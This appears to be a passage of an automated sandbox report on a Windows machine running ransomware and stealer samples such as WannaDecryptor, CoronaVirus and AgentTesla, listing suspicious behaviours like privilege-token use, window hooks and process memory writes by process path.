N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A
N/A N/A C:\Users\Admin\Downloads\CoronaVirus.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\AgentTesla.exe N/A
N/A N/A C:\Users\Admin\Downloads\@[email protected] N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\Downloads\000.exe N/A
N/A N/A C:\Users\Admin\Downloads\000.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1776 wrote to memory of 4452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 4452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1776 wrote to memory of 1016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
